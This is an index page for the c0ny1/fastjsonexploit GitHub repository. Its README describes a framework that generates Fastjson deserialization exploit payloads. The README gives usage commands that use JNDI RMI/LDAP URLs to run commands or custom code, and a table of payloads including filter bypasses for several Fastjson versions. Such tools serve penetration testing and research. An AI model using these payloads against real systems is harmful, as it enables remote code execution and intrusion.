Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/c0ny1/fastjsonexploit

Fastjson vulnerability quickly exploits the framework（fastjson漏洞快速利用框架）
https://github.com/c0ny1/fastjsonexploit

exp exploiting-vulnerabilities fastjson poc

Last synced: 11 days ago
JSON representation

Fastjson vulnerability quickly exploits the framework（fastjson漏洞快速利用框架）

Host: GitHub
URL: https://github.com/c0ny1/fastjsonexploit
Owner: c0ny1
Created: 2019-07-20T04:55:57.000Z (over 5 years ago)
Default Branch: master
Last Pushed: 2022-12-16T03:56:54.000Z (almost 2 years ago)
Last Synced: 2024-10-26T11:32:07.339Z (18 days ago)
Topics: exp, exploiting-vulnerabilities, fastjson, poc
Language: Java
Homepage:
Size: 15.5 MB
Stars: 1,270
Watchers: 15
Forks: 168
Open Issues: 8
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

        # FastjonExploit | Fastjson漏洞快速利用框架

## 0x01 Introduce

FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架，主要功能如下：

1. 一键生成利用payload，并启动所有利用环境。

2. 管理Fastjson各种payload（当然是立志整理所有啦，目前6个类，共11种利用及绕过）

## 0x02 Buiding

Requires Java 1.7+ and Maven 3.x+

```mvn clean package -DskipTests```

## 0x03 Usage

```

.---- -. -. .  .   .

   ( .',----- - - ' '

    \_/      ;--:-\         __--------------------__

   __U__n_^_''__[. |ooo___  | |_!_||_!_||_!_||_!_| |

 c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |

 ,_\___________'_|,L______],|______________________|

/;_(@)(@)==(@)(@)   (o)(o)      (o)^(o)--(o)^(o)

FastjsonExploit is a Fastjson library vulnerability exploit framework

                Author:c0ny1

Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]

Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"

Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"

Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"

Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"

Available payload types:

    Payload                PayloadType VulVersion      Dependencies                                      

    -------                ----------- ----------      ------------                                      

    BasicDataSource1       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4

    BasicDataSource2       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4

    JdbcRowSetImpl1        jndi        1.2.2.1-1.2.2.4                                                   

    JdbcRowSetImpl2        jndi        1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass                            

    JdbcRowSetImpl3        jndi        1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass                            

    JdbcRowSetImpl4        jndi        1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass                            

    JdbcRowSetImpl5        jndi        1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass                            

    JndiDataSourceFactory1 jndi        1.2.2.1-1.2.2.4 ibatis-core:3.0                                   

    SimpleJndiBeanFactory1 jndi        1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE                      

    TemplatesImpl1         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)   

    TemplatesImpl2         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)  

```

## 0x04 Notice

* 帮助信息所说明的payload可利用的Fastjson版本，不一定正确。后续测试更正！

## 0x05 Reference

* https://github.com/frohoff/ysoserial

* https://github.com/mbechler/marshalsec

* https://github.com/kxcode/JNDI-Exploit-Bypass-Demo